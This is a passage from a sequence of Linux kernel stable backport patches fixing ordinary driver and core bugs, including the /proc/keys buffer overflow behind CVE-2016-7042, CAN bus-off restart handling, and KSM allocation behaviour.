.agc_analog_digital_select_gpio = 0x00, /* According with PV cxPolaris.inf file */ + .agc_analog_digital_select_gpio = 0x1c, .tuner_sif_gpio = -1, .tuner_scl_gpio = -1, .tuner_sda_gpio = -1, diff --git a/drivers/media/usb/cx231xx/cx231xx-core.c b/drivers/media/usb/cx231xx/cx231xx-core.c index 4ba3ce09b71..6f5ffcc1935 100644 --- a/drivers/media/usb/cx231xx/cx231xx-core.c +++ b/drivers/media/usb/cx231xx/cx231xx-core.c @@ -723,6 +723,7 @@ int cx231xx_set_mode(struct cx231xx *dev, enum cx231xx_mode set_mode) break; case CX231XX_BOARD_CNXT_RDE_253S: case CX231XX_BOARD_CNXT_RDU_253S: + case CX231XX_BOARD_PV_PLAYTV_USB_HYBRID: errCode = cx231xx_set_agc_analog_digital_mux_select(dev, 1); break; case CX231XX_BOARD_HAUPPAUGE_EXETER: @@ -747,7 +748,7 @@ int cx231xx_set_mode(struct cx231xx *dev, enum cx231xx_mode set_mode) case CX231XX_BOARD_PV_PLAYTV_USB_HYBRID: case CX231XX_BOARD_HAUPPAUGE_USB2_FM_PAL: case CX231XX_BOARD_HAUPPAUGE_USB2_FM_NTSC: - errCode = cx231xx_set_agc_analog_digital_mux_select(dev, 0); + errCode = cx231xx_set_agc_analog_digital_mux_select(dev, 0); break; default: break; From 4499fcbdb808df1a8ad9cf16d1a33cfcc1a2c745 Mon Sep 17 00:00:00 2001 From: Liu Gang Date: Fri, 21 Oct 2016 15:31:28 +0800 Subject: [PATCH 295/315] gpio: mpc8xxx: Correct irq handler function commit d71cf15b865bdd45925f7b094d169aaabd705145 upstream. From the beginning of the gpio-mpc8xxx.c, the "handle_level_irq" has being used to handle GPIO interrupts in the PowerPC/Layerscape platforms. But actually, almost all PowerPC/Layerscape platforms assert an interrupt request upon either a high-to-low change or any change on the state of the signal. So the "handle_level_irq" is not reasonable for PowerPC/Layerscape GPIO interrupt, it should be "handle_edge_irq". Otherwise the system may lost some interrupts from the PIN's state changes. Signed-off-by: Liu Gang Signed-off-by: Linus Walleij Signed-off-by: Willy Tarreau --- drivers/gpio/gpio-mpc8xxx.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/gpio/gpio-mpc8xxx.c b/drivers/gpio/gpio-mpc8xxx.c index 2aa3ca215bd..d5376aa1c5e 100644 --- a/drivers/gpio/gpio-mpc8xxx.c +++ b/drivers/gpio/gpio-mpc8xxx.c @@ -295,7 +295,7 @@ static int mpc8xxx_gpio_irq_map(struct irq_domain *h, unsigned int virq, mpc8xxx_irq_chip.irq_set_type = mpc8xxx_gc->of_dev_id_data; irq_set_chip_data(virq, h->host_data); - irq_set_chip_and_handler(virq, &mpc8xxx_irq_chip, handle_level_irq); + irq_set_chip_and_handler(virq, &mpc8xxx_irq_chip, handle_edge_irq); return 0; } From a6e9fafcb75675947268fc121b81bc662023c522 Mon Sep 17 00:00:00 2001 From: Jan Viktorin Date: Tue, 17 May 2016 11:22:17 +0200 Subject: [PATCH 296/315] uio: fix dmem_region_start computation commit 4d31a2588ae37a5d0f61f4d956454e9504846aeb upstream. The variable i contains a total number of resources (including IORESOURCE_IRQ). However, we want the dmem_region_start to point after the last resource of type IORESOURCE_MEM. The original behaviour leads (very likely) to skipping several UIO mapping regions and makes them useless. Fix this by computing dmem_region_start from the uiomem which points to the last used UIO mapping. Fixes: 0a0c3b5a24bd ("Add new uio device for dynamic memory allocation") Signed-off-by: Jan Viktorin Signed-off-by: Willy Tarreau --- drivers/uio/uio_dmem_genirq.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/uio/uio_dmem_genirq.c b/drivers/uio/uio_dmem_genirq.c index 252434c9ea9..2290b1f4b41 100644 --- a/drivers/uio/uio_dmem_genirq.c +++ b/drivers/uio/uio_dmem_genirq.c @@ -229,7 +229,7 @@ static int uio_dmem_genirq_probe(struct platform_device *pdev) ++uiomem; } - priv->dmem_region_start = i; + priv->dmem_region_start = uiomem - &uioinfo->mem[0]; priv->num_dmem_regions = pdata->num_dynamic_regions; for (i = 0; i < pdata->num_dynamic_regions; ++i) { From b9eabdf01038d11a75b9361f71e86b857faaf404 Mon Sep 17 00:00:00 2001 From: David Howells Date: Wed, 26 Oct 2016 15:01:54 +0100 Subject: [PATCH 297/315] KEYS: Fix short sprintf buffer in /proc/keys show function commit 03dab869b7b239c4e013ec82aea22e181e441cfc upstream. This fixes CVE-2016-7042. Fix a short sprintf buffer in proc_keys_show(). If the gcc stack protector is turned on, this can cause a panic due to stack corruption. The problem is that xbuf[] is not big enough to hold a 64-bit timeout rendered as weeks: (gdb) p 0xffffffffffffffffULL/(60*60*24*7) $2 = 30500568904943 That's 14 chars plus NUL, not 11 chars plus NUL. Expand the buffer to 16 chars. I think the unpatched code apparently works if the stack-protector is not enabled because on a 32-bit machine the buffer won't be overflowed and on a 64-bit machine there's a 64-bit aligned pointer at one side and an int that isn't checked again on the other side. The panic incurred looks something like: Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: ffffffff81352ebe CPU: 0 PID: 1692 Comm: reproducer Not tainted 4.7.2-201.fc24.x86_64 #1 Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2011 0000000000000086 00000000fbbd2679 ffff8800a044bc00 ffffffff813d941f ffffffff81a28d58 ffff8800a044bc98 ffff8800a044bc88 ffffffff811b2cb6 ffff880000000010 ffff8800a044bc98 ffff8800a044bc30 00000000fbbd2679 Call Trace: [] dump_stack+0x63/0x84 [] panic+0xde/0x22a [] ? proc_keys_show+0x3ce/0x3d0 [] __stack_chk_fail+0x19/0x30 [] proc_keys_show+0x3ce/0x3d0 [] ? key_validate+0x50/0x50 [] ? key_default_cmp+0x20/0x20 [] seq_read+0x2cc/0x390 [] proc_reg_read+0x42/0x70 [] __vfs_read+0x37/0x150 [] ? security_file_permission+0xa0/0xc0 [] vfs_read+0x96/0x130 [] SyS_read+0x55/0xc0 [] entry_SYSCALL_64_fastpath+0x1a/0xa4 Reported-by: Ondrej Kozina Signed-off-by: David Howells Tested-by: Ondrej Kozina Signed-off-by: James Morris Signed-off-by: Willy Tarreau --- security/keys/proc.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/security/keys/proc.c b/security/keys/proc.c index 217b6855e81..374c3301b80 100644 --- a/security/keys/proc.c +++ b/security/keys/proc.c @@ -188,7 +188,7 @@ static int proc_keys_show(struct seq_file *m, void *v) struct timespec now; unsigned long timo; key_ref_t key_ref, skey_ref; - char xbuf[12]; + char xbuf[16]; int rc; key_ref = make_key_ref(key, 0); From c670aaed3eadc247e827f6ae21ea29a5c229deca Mon Sep 17 00:00:00 2001 From: Long Li Date: Wed, 5 Oct 2016 16:57:46 -0700 Subject: [PATCH 298/315] hv: do not lose pending heartbeat vmbus packets commit 407a3aee6ee2d2cb46d9ba3fc380bc29f35d020c upstream. The host keeps sending heartbeat packets independent of the guest responding to them. Even though we respond to the heartbeat messages at interrupt level, we can have situations where there maybe multiple heartbeat messages pending that have not been responded to. For instance this occurs when the VM is paused and the host continues to send the heartbeat messages. Address this issue by draining and responding to all the heartbeat messages that maybe pending. Signed-off-by: Long Li Signed-off-by: K. Y. Srinivasan Signed-off-by: Willy Tarreau --- drivers/hv/hv_util.c | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/drivers/hv/hv_util.c b/drivers/hv/hv_util.c index 64c778f7756..5f69c839d72 100644 --- a/drivers/hv/hv_util.c +++ b/drivers/hv/hv_util.c @@ -244,10 +244,14 @@ static void heartbeat_onchannelcallback(void *context) struct heartbeat_msg_data *heartbeat_msg; u8 *hbeat_txf_buf = util_heartbeat.recv_buffer; - vmbus_recvpacket(channel, hbeat_txf_buf, - PAGE_SIZE, &recvlen, &requestid); + while (1) { + + vmbus_recvpacket(channel, hbeat_txf_buf, + PAGE_SIZE, &recvlen, &requestid); + + if (!recvlen) + break; - if (recvlen > 0) { icmsghdrp = (struct icmsg_hdr *)&hbeat_txf_buf[ sizeof(struct vmbuspipe_hdr)]; From 0b0d4fc3fbb0f757ff9d84a9ca8508e060851e49 Mon Sep 17 00:00:00 2001 From: Arnd Bergmann Date: Mon, 24 Oct 2016 17:22:01 +0200 Subject: [PATCH 299/315] staging: iio: ad5933: avoid uninitialized variable in error case commit 34eee70a7b82b09dbda4cb453e0e21d460dae226 upstream. The ad5933_i2c_read function returns an error code to indicate whether it could read data or not. However ad5933_work() ignores this return code and just accesses the data unconditionally, which gets detected by gcc as a possible bug: drivers/staging/iio/impedance-analyzer/ad5933.c: In function 'ad5933_work': drivers/staging/iio/impedance-analyzer/ad5933.c:649:16: warning: 'status' may be used uninitialized in this function [-Wmaybe-uninitialized] This adds minimal error handling so we only evaluate the data if it was correctly read. Link: https://patchwork.kernel.org/patch/8110281/ Signed-off-by: Arnd Bergmann Acked-by: Lars-Peter Clausen Signed-off-by: Jonathan Cameron Signed-off-by: Willy Tarreau --- drivers/staging/iio/impedance-analyzer/ad5933.c | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/drivers/staging/iio/impedance-analyzer/ad5933.c b/drivers/staging/iio/impedance-analyzer/ad5933.c index bc23d66a7a1..1ff17352abd 100644 --- a/drivers/staging/iio/impedance-analyzer/ad5933.c +++ b/drivers/staging/iio/impedance-analyzer/ad5933.c @@ -646,6 +646,7 @@ static void ad5933_work(struct work_struct *work) struct iio_dev *indio_dev = i2c_get_clientdata(st->client); signed short buf[2]; unsigned char status; + int ret; mutex_lock(&indio_dev->mlock); if (st->state == AD5933_CTRL_INIT_START_FREQ) { @@ -653,19 +654,22 @@ static void ad5933_work(struct work_struct *work) ad5933_cmd(st, AD5933_CTRL_START_SWEEP); st->state = AD5933_CTRL_START_SWEEP; schedule_delayed_work(&st->work, st->poll_time_jiffies); - mutex_unlock(&indio_dev->mlock); - return; + goto out; } - ad5933_i2c_read(st->client, AD5933_REG_STATUS, 1, &status); + ret = ad5933_i2c_read(st->client, AD5933_REG_STATUS, 1, &status); + if (ret) + goto out; if (status & AD5933_STAT_DATA_VALID) { int scan_count = bitmap_weight(indio_dev->active_scan_mask, indio_dev->masklength); - ad5933_i2c_read(st->client, + ret = ad5933_i2c_read(st->client, test_bit(1, indio_dev->active_scan_mask) ? AD5933_REG_REAL_DATA : AD5933_REG_IMAG_DATA, scan_count * 2, (u8 *)buf); + if (ret) + goto out; if (scan_count == 2) { buf[0] = be16_to_cpu(buf[0]); @@ -677,8 +681,7 @@ static void ad5933_work(struct work_struct *work) } else { /* no data available - try again later */ schedule_delayed_work(&st->work, st->poll_time_jiffies); - mutex_unlock(&indio_dev->mlock); - return; + goto out; } if (status & AD5933_STAT_SWEEP_DONE) { @@ -690,7 +693,7 @@ static void ad5933_work(struct work_struct *work) ad5933_cmd(st, AD5933_CTRL_INC_FREQ); schedule_delayed_work(&st->work, st->poll_time_jiffies); } - +out: mutex_unlock(&indio_dev->mlock); } From 2ef72292774600e4b4e1b1dbddf8cba971c9efb3 Mon Sep 17 00:00:00 2001 From: Alexander Usyskin Date: Mon, 31 Oct 2016 19:02:39 +0200 Subject: [PATCH 300/315] mei: bus: fix received data size check in NFC fixup commit 582ab27a063a506ccb55fc48afcc325342a2deba upstream. NFC version reply size checked against only header size, not against full message size. That may lead potentially to uninitialized memory access in version data. That leads to warnings when version data is accessed: drivers/misc/mei/bus-fixup.c: warning: '*((void *)&ver+11)' may be used uninitialized in this function [-Wuninitialized]: => 212:2 Reported in Build regressions/improvements in v4.9-rc3 https://lkml.org/lkml/2016/10/30/57 [js] the check is in 3.12 only once Fixes: 59fcd7c63abf (mei: nfc: Initial nfc implementation) Signed-off-by: Alexander Usyskin Signed-off-by: Tomas Winkler Signed-off-by: Jiri Slaby Signed-off-by: Willy Tarreau --- drivers/misc/mei/nfc.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/misc/mei/nfc.c b/drivers/misc/mei/nfc.c index 4b7ea3fb143..1f8f856946c 100644 --- a/drivers/misc/mei/nfc.c +++ b/drivers/misc/mei/nfc.c @@ -292,7 +292,7 @@ static int mei_nfc_if_version(struct mei_nfc_dev *ndev) return -ENOMEM; bytes_recv = __mei_cl_recv(cl, (u8 *)reply, if_version_length); - if (bytes_recv < 0 || bytes_recv < sizeof(struct mei_nfc_reply)) { + if (bytes_recv < if_version_length) { dev_err(&dev->pdev->dev, "Could not read IF version\n"); ret = -EIO; goto err; From bdb29c7b5260e76d5519d9fae0cfd6136c738821 Mon Sep 17 00:00:00 2001 From: Punit Agrawal Date: Tue, 18 Oct 2016 17:07:19 +0100 Subject: [PATCH 301/315] ACPI / APEI: Fix incorrect return value of ghes_proc() commit 806487a8fc8f385af75ed261e9ab658fc845e633 upstream. Although ghes_proc() tests for errors while reading the error status, it always return success (0). Fix this by propagating the return value. Fixes: d334a49113a4a33 (ACPI, APEI, Generic Hardware Error Source memory error support) Signed-of-by: Punit Agrawal Tested-by: Tyler Baicar Reviewed-by: Borislav Petkov [ rjw: Subject ] Signed-off-by: Rafael J. Wysocki Signed-off-by: Willy Tarreau --- drivers/acpi/apei/ghes.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/acpi/apei/ghes.c b/drivers/acpi/apei/ghes.c index fcd7d91cec3..070b843c37e 100644 --- a/drivers/acpi/apei/ghes.c +++ b/drivers/acpi/apei/ghes.c @@ -647,7 +647,7 @@ static int ghes_proc(struct ghes *ghes) ghes_do_proc(ghes, ghes->estatus); out: ghes_clear_estatus(ghes); - return 0; + return rc; } static void ghes_add_timer(struct ghes *ghes) From 569d62a3b7863d47abffe328bfa54ac5ad0457bc Mon Sep 17 00:00:00 2001 From: Myron Stowe Date: Tue, 3 Feb 2015 16:01:24 -0700 Subject: [PATCH 302/315] PCI: Handle read-only BARs on AMD CS553x devices commit 06cf35f903aa6da0cc8d9f81e9bcd1f7e1b534bb upstream. Some AMD CS553x devices have read-only BARs because of a firmware or hardware defect. There's a workaround in quirk_cs5536_vsa(), but it no longer works after 36e8164882ca ("PCI: Restore detection of read-only BARs"). Prior to 36e8164882ca, we filled in res->start; afterwards we leave it zeroed out. The quirk only updated the size, so the driver tried to use a region starting at zero, which didn't work. Expand quirk_cs5536_vsa() to read the base addresses from the BARs and hard-code the sizes. On Nix's system BAR 2's read-only value is 0x6200. Prior to 36e8164882ca, we interpret that as a 512-byte BAR based on the lowest-order bit set. Per datasheet sec 5.6.1, that BAR (MFGPT) requires only 64 bytes; use that to avoid clearing any address bits if a platform uses only 64-byte alignment. [js] pcibios_bus_to_resource takes pdev, not bus in 3.12 [bhelgaas: changelog, reduce BAR 2 size to 64] Fixes: 36e8164882ca ("PCI: Restore detection of read-only BARs") Link: https://bugzilla.kernel.org/show_bug.cgi?id=85991#c4 Link: http://support.amd.com/TechDocs/31506_cs5535_databook.pdf Link: http://support.amd.com/TechDocs/33238G_cs5536_db.pdf Reported-and-tested-by: Nix Signed-off-by: Myron Stowe Signed-off-by: Bjorn Helgaas Signed-off-by: Jiri Slaby Signed-off-by: Willy Tarreau --- drivers/pci/quirks.c | 41 +++++++++++++++++++++++++++++++++++++---- 1 file changed, 37 insertions(+), 4 deletions(-) diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c index a6637158d07..b6625e58bc5 100644 --- a/drivers/pci/quirks.c +++ b/drivers/pci/quirks.c @@ -339,19 +339,52 @@ static void quirk_s3_64M(struct pci_dev *dev) DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_S3, PCI_DEVICE_ID_S3_868, quirk_s3_64M); DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_S3, PCI_DEVICE_ID_S3_968, quirk_s3_64M); +static void quirk_io(struct pci_dev *dev, int pos, unsigned size, + const char *name) +{ + u32 region; + struct pci_bus_region bus_region; + struct resource *res = dev->resource + pos; + + pci_read_config_dword(dev, PCI_BASE_ADDRESS_0 + (pos << 2), ®ion); + + if (!region) + return; + + res->name = pci_name(dev); + res->flags = region & ~PCI_BASE_ADDRESS_IO_MASK; + res->flags |= + (IORESOURCE_IO | IORESOURCE_PCI_FIXED | IORESOURCE_SIZEALIGN); + region &= ~(size - 1); + + /* Convert from PCI bus to resource space */ + bus_region.start = region; + bus_region.end = region + size - 1; + pcibios_bus_to_resource(dev, res, &bus_region); + + dev_info(&dev->dev, FW_BUG "%s quirk: reg 0x%x: %pR\n", + name, PCI_BASE_ADDRESS_0 + (pos << 2), res); +} + /* * Some CS5536 BIOSes (for example, the Soekris NET5501 board w/ comBIOS * ver. 1.33 20070103) don't set the correct ISA PCI region header info. * BAR0 should be 8 bytes; instead, it may be set to something like 8k * (which conflicts w/ BAR1's memory range). + * + * CS553x's ISA PCI BARs may also be read-only (ref: + * https://bugzilla.kernel.org/show_bug.cgi?id=85991 - Comment #4 forward). */ static void quirk_cs5536_vsa(struct pci_dev *dev) { + static char *name = "CS5536 ISA bridge"; + if (pci_resource_len(dev, 0) != 8) { - struct resource *res = &dev->resource[0]; - res->end = res->start + 8 - 1; - dev_info(&dev->dev, "CS5536 ISA bridge bug detected " - "(incorrect header); workaround applied.\n"); + quirk_io(dev, 0, 8, name); /* SMB */ + quirk_io(dev, 1, 256, name); /* GPIO */ + quirk_io(dev, 2, 64, name); /* MFGPT */ + dev_info(&dev->dev, "%s bug detected (incorrect header); workaround applied\n", + name); } } DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_CS5536_ISA, quirk_cs5536_vsa); From 04be31f5be113de38b80e307e3c6f8468f3ff25e Mon Sep 17 00:00:00 2001 From: Chris Metcalf Date: Wed, 16 Nov 2016 11:18:05 -0500 Subject: [PATCH 303/315] tile: avoid using clocksource_cyc2ns with absolute cycle count commit e658a6f14d7c0243205f035979d0ecf6c12a036f upstream. For large values of "mult" and long uptimes, the intermediate result of "cycles * mult" can overflow 64 bits. For example, the tile platform calls clocksource_cyc2ns with a 1.2 GHz clock; we have mult = 853, and after 208.5 days, we overflow 64 bits. Since clocksource_cyc2ns() is intended to be used for relative cycle counts, not absolute cycle counts, performance is more importance than accepting a wider range of cycle values. So, just use mult_frac() directly in tile's sched_clock(). Commit 4cecf6d401a0 ("sched, x86: Avoid unnecessary overflow in sched_clock") by Salman Qazi results in essentially the same generated code for x86 as this change does for tile. In fact, a follow-on change by Salman introduced mult_frac() and switched to using it, so the C code was largely identical at that point too. Peter Zijlstra then added mul_u64_u32_shr() and switched x86 to use it. This is, in principle, better; by optimizing the 64x64->64 multiplies to be 32x32->64 multiplies we can potentially save some time. However, the compiler piplines the 64x64->64 multiplies pretty well, and the conditional branch in the generic mul_u64_u32_shr() causes some bubbles in execution, with the result that it's pretty much a wash. If tilegx provided its own implementation of mul_u64_u32_shr() without the conditional branch, we could potentially save 3 cycles, but that seems like small gain for a fair amount of additional build scaffolding; no other platform currently provides a mul_u64_u32_shr() override, and tile doesn't currently have an header to put the override in. Additionally, gcc currently has an optimization bug that prevents it from recognizing the opportunity to use a 32x32->64 multiply, and so the result would be no better than the existing mult_frac() until such time as the compiler is fixed. For now, just using mult_frac() seems like the right answer. Signed-off-by: Chris Metcalf Signed-off-by: Willy Tarreau --- arch/tile/kernel/time.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/arch/tile/kernel/time.c b/arch/tile/kernel/time.c index 5ac397ec698..9df6d0d6d18 100644 --- a/arch/tile/kernel/time.c +++ b/arch/tile/kernel/time.c @@ -215,8 +215,8 @@ void do_timer_interrupt(struct pt_regs *regs, int fault_num) */ unsigned long long sched_clock(void) { - return clocksource_cyc2ns(get_cycles(), - sched_clock_mult, SCHED_CLOCK_SHIFT); + return mult_frac(get_cycles(), + sched_clock_mult, 1ULL << SCHED_CLOCK_SHIFT); } int setup_profiling_timer(unsigned int multiplier) From 46049e5ca6b3ef22c2a189a7815b849204483d92 Mon Sep 17 00:00:00 2001 From: Mike Snitzer Date: Wed, 24 Aug 2016 21:12:58 -0400 Subject: [PATCH 304/315] dm flakey: fix reads to be issued if drop_writes configured commit 299f6230bc6d0ccd5f95bb0fb865d80a9c7d5ccc upstream. v4.8-rc3 commit 99f3c90d0d ("dm flakey: error READ bios during the down_interval") overlooked the 'drop_writes' feature, which is meant to allow reads to be issued rather than errored, during the down_interval. Fixes: 99f3c90d0d ("dm flakey: error READ bios during the down_interval") Reported-by: Qu Wenruo Signed-off-by: Mike Snitzer Signed-off-by: Willy Tarreau --- drivers/md/dm-flakey.c | 27 ++++++++++++++++----------- 1 file changed, 16 insertions(+), 11 deletions(-) diff --git a/drivers/md/dm-flakey.c b/drivers/md/dm-flakey.c index a9a47cd029d..ace01a30f31 100644 --- a/drivers/md/dm-flakey.c +++ b/drivers/md/dm-flakey.c @@ -286,15 +286,13 @@ static int flakey_map(struct dm_target *ti, struct bio *bio) pb->bio_submitted = true; /* - * Map reads as normal only if corrupt_bio_byte set. + * Error reads if neither corrupt_bio_byte or drop_writes are set. + * Otherwise, flakey_end_io() will decide if the reads should be modified. */ if (bio_data_dir(bio) == READ) { - /* If flags were specified, only corrupt those that match. */ - if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == READ) && - all_corrupt_bio_flags_match(bio, fc)) - goto map_bio; - else + if (!fc->corrupt_bio_byte && !test_bit(DROP_WRITES, &fc->flags)) return -EIO; + goto map_bio; } /* @@ -331,14 +329,21 @@ static int flakey_end_io(struct dm_target *ti, struct bio *bio, int error) struct flakey_c *fc = ti->private; struct per_bio_data *pb = dm_per_bio_data(bio, sizeof(struct per_bio_data)); - /* - * Corrupt successful READs while in down state. - */ if (!error && pb->bio_submitted && (bio_data_dir(bio) == READ)) { - if (fc->corrupt_bio_byte) + if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == READ) && + all_corrupt_bio_flags_match(bio, fc)) { + /* + * Corrupt successful matching READs while in down state. + */ corrupt_bio_data(bio, fc); - else + + } else if (!test_bit(DROP_WRITES, &fc->flags)) { + /* + * Error read during the down_interval if drop_writes + * wasn't configured. + */ return -EIO; + } } return error; From 3419dc516ec27ae51ca8b55a1436b3d1c484d877 Mon Sep 17 00:00:00 2001 From: zhong jiang Date: Wed, 28 Sep 2016 15:22:30 -0700 Subject: [PATCH 305/315] mm,ksm: fix endless looping in allocating memory when ksm enable commit 5b398e416e880159fe55eefd93c6588fa072cd66 upstream. I hit the following hung task when runing a OOM LTP test case with 4.1 kernel. Call trace: [] __switch_to+0x74/0x8c [] __schedule+0x23c/0x7bc [] schedule+0x3c/0x94 [] rwsem_down_write_failed+0x214/0x350 [] down_write+0x64/0x80 [] __ksm_exit+0x90/0x19c [] mmput+0x118/0x11c [] do_exit+0x2dc/0xa74 [] do_group_exit+0x4c/0xe4 [] get_signal+0x444/0x5e0 [] do_signal+0x1d8/0x450 [] do_notify_resume+0x70/0x78 The oom victim cannot terminate because it needs to take mmap_sem for write while the lock is held by ksmd for read which loops in the page allocator ksm_do_scan scan_get_next_rmap_item down_read get_next_rmap_item alloc_rmap_item #ksmd will loop permanently. There is no way forward because the oom victim cannot release any memory in 4.1 based kernel. Since 4.6 we have the oom reaper which would solve this problem because it would release the memory asynchronously. Nevertheless we can relax alloc_rmap_item requirements and use __GFP_NORETRY because the allocation failure is acceptable as ksm_do_scan would just retry later after the lock got dropped. Such a patch would be also easy to backport to older stable kernels which do not have oom_reaper. While we are at it add GFP_NOWARN so the admin doesn't have to be alarmed by the allocation failure. Link: http://lkml.kernel.org/r/1474165570-44398-1-git-send-email-zhongjiang@huawei.com Signed-off-by: zhong jiang Suggested-by: Hugh Dickins Suggested-by: Michal Hocko Acked-by: Michal Hocko Acked-by: Hugh Dickins Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds Signed-off-by: Willy Tarreau --- mm/ksm.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/mm/ksm.c b/mm/ksm.c index 7bf748f30aa..d1b19b9e888 100644 --- a/mm/ksm.c +++ b/mm/ksm.c @@ -283,7 +283,8 @@ static inline struct rmap_item *alloc_rmap_item(void) { struct rmap_item *rmap_item; - rmap_item = kmem_cache_zalloc(rmap_item_cache, GFP_KERNEL); + rmap_item = kmem_cache_zalloc(rmap_item_cache, GFP_KERNEL | + __GFP_NORETRY | __GFP_NOWARN); if (rmap_item) ksm_rmap_items++; return rmap_item; From ebee2e2f308f75e2bba58f6194fa39fce4ef9529 Mon Sep 17 00:00:00 2001 From: Sergei Miroshnichenko Date: Wed, 7 Sep 2016 16:51:12 +0300 Subject: [PATCH 306/315] can: dev: fix deadlock reported after bus-off commit 9abefcb1aaa58b9d5aa40a8bb12c87d02415e4c8 upstream. A timer was used to restart after the bus-off state, leading to a relatively large can_restart() executed in an interrupt context, which in turn sets up pinctrl. When this happens during system boot, there is a high probability of grabbing the pinctrl_list_mutex, which is locked already by the probe() of other device, making the kernel suspect a deadlock condition [1]. To resolve this issue, the restart_timer is replaced by a delayed work. [1] https://github.com/victronenergy/venus/issues/24 Signed-off-by: Sergei Miroshnichenko Signed-off-by: Marc Kleine-Budde Signed-off-by: Willy Tarreau --- drivers/net/can/dev.c | 27 +++++++++++++++++---------- include/linux/can/dev.h | 3 ++- 2 files changed, 19 insertions(+), 11 deletions(-) diff --git a/drivers/net/can/dev.c b/drivers/net/can/dev.c index 464e5f66b66..284d751ea97 100644 --- a/drivers/net/can/dev.c +++ b/drivers/net/can/dev.c @@ -22,6 +22,7 @@ #include #include #include +#include #include #include #include @@ -394,9 +395,8 @@ EXPORT_SYMBOL_GPL(can_free_echo_skb); /* * CAN device restart for bus-off recovery */ -static void can_restart(unsigned long data) +static void can_restart(struct net_device *dev) { - struct net_device *dev = (struct net_device *)data; struct can_priv *priv = netdev_priv(dev); struct net_device_stats *stats = &dev->stats; struct sk_buff *skb; @@ -436,6 +436,14 @@ restart: netdev_err(dev, "Error %d during restart", err); } +static void can_restart_work(struct work_struct *work) +{ + struct delayed_work *dwork = to_delayed_work(work); + struct can_priv *priv = container_of(dwork, struct can_priv, restart_work); + + can_restart(priv->dev); +} + int can_restart_now(struct net_device *dev) { struct can_priv *priv = netdev_priv(dev); @@ -449,8 +457,8 @@ int can_restart_now(struct net_device *dev) if (priv->state != CAN_STATE_BUS_OFF) return -EBUSY; - /* Runs as soon as possible in the timer context */ - mod_timer(&priv->restart_timer, jiffies); + cancel_delayed_work_sync(&priv->restart_work); + can_restart(dev); return 0; } @@ -472,8 +480,8 @@ void can_bus_off(struct net_device *dev) priv->can_stats.bus_off++; if (priv->restart_ms) - mod_timer(&priv->restart_timer, - jiffies + (priv->restart_ms * HZ) / 1000); + schedule_delayed_work(&priv->restart_work, + msecs_to_jiffies(priv->restart_ms)); } EXPORT_SYMBOL_GPL(can_bus_off); @@ -556,6 +564,7 @@ struct net_device *alloc_candev(int sizeof_priv, unsigned int echo_skb_max) return NULL; priv = netdev_priv(dev); + priv->dev = dev; if (echo_skb_max) { priv->echo_skb_max = echo_skb_max; @@ -565,7 +574,7 @@ struct net_device *alloc_candev(int sizeof_priv, unsigned int echo_skb_max) priv->state = CAN_STATE_STOPPED; - init_timer(&priv->restart_timer); + INIT_DELAYED_WORK(&priv->restart_work, can_restart_work); return dev; } @@ -599,8 +608,6 @@ int open_candev(struct net_device *dev) if (!netif_carrier_ok(dev)) netif_carrier_on(dev); - setup_timer(&priv->restart_timer, can_restart, (unsigned long)dev); - return 0; } EXPORT_SYMBOL_GPL(open_candev); @@ -615,7 +622,7 @@ void close_candev(struct net_device *dev) { struct can_priv *priv = netdev_priv(dev); - del_timer_sync(&priv->restart_timer); + cancel_delayed_work_sync(&priv->restart_work); can_flush_echo_skb(dev); } EXPORT_SYMBOL_GPL(close_candev); diff --git a/include/linux/can/dev.h b/include/linux/can/dev.h index fb0ab651a04..fb9fbe2f63e 100644 --- a/include/linux/can/dev.h +++ b/include/linux/can/dev.h @@ -31,6 +31,7 @@ enum can_mode { * CAN common private data */ struct can_priv { + struct net_device *dev; struct can_device_stats can_stats; struct can_bittiming bittiming; @@ -42,7 +43,7 @@ struct can_priv { u32 ctrlmode_supported; int restart_ms; - struct timer_list restart_timer; + struct delayed_work restart_work; int (*do_set_bittiming)(struct net_device *dev); int (*do_set_mode)(struct net_device *dev, enum can_mode mode); From 2c8c5e677787929594e6b9d5363737e9319ad1db Mon Sep 17 00:00:00 2001 From: Michael Walle Date: Tue, 19 Jul 2016 16:43:26 +0200 Subject: [PATCH 307/315] hwmon: (adt7411) set bit 3 in CFG1 register commit b53893aae441a034bf4dbbad42fe218561d7d81f upstream. According to the datasheet you should only write 1 to this bit. If it is not set, at least AIN3 will return bad values on newer silicon revisions. Fixes: d84ca5b345c2 ("hwmon: Add driver for ADT7411 voltage and temperature sensor") Signed-off-by: Michael Walle Signed-off-by: Guenter Roeck Signed-off-by: Willy Tarreau --- drivers/hwmon/adt7411.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/drivers/hwmon/adt7411.c b/drivers/hwmon/adt7411.c index d9299dee37d..dddaa161aad 100644 --- a/drivers/hwmon/adt7411.c +++ b/drivers/hwmon/adt7411.c @@ -30,6 +30,7 @@ #define ADT7411_REG_CFG1 0x18 #define ADT7411_CFG1_START_MONITOR (1 << 0) +#define ADT7411_CFG1_RESERVED_BIT3 (1 << 3) #define ADT7411_REG_CFG2 0x19 #define ADT7411_CFG2_DISABLE_AVG (1 << 5) @@ -292,8 +293,10 @@ static int adt7411_probe(struct i2c_client *client, mutex_init(&data->device_lock); mutex_init(&data->update_lock); + /* According to the datasheet, we must only write 1 to bit 3 */ ret = adt7411_modify_bit(client, ADT7411_REG_CFG1, - ADT7411_CFG1_START_MONITOR, 1); + 